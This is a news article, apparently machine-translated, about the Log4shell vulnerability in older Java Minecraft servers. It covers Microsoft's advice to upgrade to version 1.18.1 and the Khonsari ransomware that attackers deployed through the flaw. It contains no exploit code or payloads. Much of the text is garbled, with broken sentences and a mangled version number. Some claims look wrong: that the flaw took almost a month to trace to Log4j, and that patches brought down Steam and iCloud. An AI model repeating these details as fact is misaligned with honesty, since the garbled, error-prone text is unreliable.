Host your own Minecraft server? Fix now and protect yourself from Log4j ransomware attacks

Are you tired of hearing about Log4shell again? Get settled in, because one of the three worst security exploits of all time doesn’t go away overnight. Microsoft has updated its article on the vulnerability (which we noted Wednesday) again, this time with a few notes on protecting “non-Microsoft-hosted Minecraft servers”.

Indeed, while Microsoft would really prefer everyone to upgrade to the “Bedrock” version of Minecraft on the Windows Store – which strongly encourages gamers to congregate on Microsoft’s own Minecraft servers – the Java version remains dominant thanks to the ease of hosting yours on a large scale. Minecraft world modified.

Like hosting any web service, however, it is not without its risks. Every time you open a computer to the Internet, you make yourself a visible target for the scum of the Earth. Servers with available services usually advertise those services on specific network ports, and even if they don’t, it is trivial to scan a system for listening services. From there, it is enough to form the correct query to exploit the available security holes.

Well, when the hole in question is as wide as Log4j’s Log4shell exploit, opening a vulnerable internet service is like leaving the doors of a mall open all night. So it is so that Microsoft is aggressively advising Minecraft server operators to upgrade their game version to the latest version 1.18.1. Unsurprisingly, the Java version of Minecraft uses Log4j for its logging, and earlier versions of the game software are totally vulnerable to the Log4shell flaw.

This awkward hand drawn logo has come and represent the severe vulnerability on the web.

This is a bigger problem than it looks for people who don’t play Minecraft, or who have only played the Bedrock version. Minecraft servers are very often hosted on older versions of the game, even since version 1.08, first released in 2014. The reason is that mods need to be updated for newer versions of the game. Some modpacks older ones are still a lot of fun, but they just won’t work on the latest version of the game. Given the severity of this Log4shell exploit – it can be triggered with just one chat message – it seems unlikely that most these servers remain open to the public, which is a shame.

Microsoft says he observed attacks on compromised Minecraft servers used to deploy Khonsari malware. Khonsari is a new type of

ransomware that Cado Sécurité actually calls “a little boring.” Essentially, the malware, once loaded, finds all mounted drives and begins to encrypt everything on them. As Khonsari leaves a ransom note, the contact details seems to be wrong, leaving affected victims no way to decrypt the data. For this reason, it is essentially a more frustrating version of a “wiper” malware that simply deletes the data.

It is interesting to see the news come full circle on this feat. Log4shell was first exposed as an exploit in Minecraft, after all. It took almost a month before they discovered that the flaw was not in Minecraft itself but rather in Log4j, sending network operators and server administrators to scramble to protect. vital infrastructure. Few people, even the developers, realized how widespread the Log4j package was. Updates to protect against the vulnerability itself dismantled Steam and iCloud briefly.